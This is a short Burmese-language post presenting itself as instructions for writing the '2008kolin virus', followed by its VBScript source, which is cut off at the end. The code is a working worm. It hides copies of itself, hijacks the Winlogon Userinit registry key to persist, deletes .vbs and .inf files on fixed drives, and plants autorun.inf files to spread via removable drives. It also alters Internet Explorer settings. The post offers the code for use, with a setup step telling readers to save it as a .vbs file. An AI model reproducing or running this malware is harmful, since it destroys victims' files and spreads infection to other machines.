2008kolin virus ေရးနည္း
ဒါကို notepad ဖြင့္ျပီး paste လုပ္လိုက္ File နည္ကို ဘာညာဘာညာ ေပါ့ ေနာက္ဆံုးမွာ .vbs ေပးေပါ့
ဒီ code ကို 2008kolin virus ပါ။ ဥာဏ္ရိွသလို သံုး
ion Explicit
On Error Resume Next
Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir = Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(Wscript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.Drives
Set ReadAll = File.OpenAsTextStream(1, -2)
Do While Not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbCrLf
Loop
Count = Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\2008kolin.vbs") Then
Set WriteAll = Fso.CreateTextFile(SystemDir & "\2008kolin.vbs", 2, True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(SystemDir & "\2008kolin.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\2008kolin.vbs"
For Each Drives In InDrive
If Drives.DriveType = 2 Then
LookVBS "inf", Drives.Path & "\"
LookVBS "INF", Drives.Path & "\"
End If
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path <> "A:" Then
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", ""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", ""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%SystemRoot%\System32\WScript.exe,2"
LookVBS "vbs", WinDir & "\"
LookVBS "vbs", Drives.Path & "\"
If Drives.DriveType = 1 Then
If Drives.Path <> "A:" Then
If Not Fso.FileExists(Drives.Path & "\2008kolin.vbs") Then
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\2008kolin.vbs", 2, True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\2008kolin.vbs")
WriteAll.Attributes = -1
End If
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True)
WriteAll.WriteLine "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe 2008kolin.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
Else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf", 2, True)
WriteAll.WriteLine "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe 2008kolin.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End If
End If
End If
End If
End If
Next
If Count <> 1 Then
Wscript.sleep 10000
End If
Loop While Count <> 1
Sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile, Cut, Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut = Right(oFile.Name, 3)
If UCase(Cut) = UCase(File2Find) Then
If oFile.Name <> "2008kolin.vbs" Then Set Delete = oFileSys.DeleteFile(SrchPath & oFile.Name, True)
End If
Next
End Sub
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\2008kolin.vbs"
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title", ""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", ""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon", "%S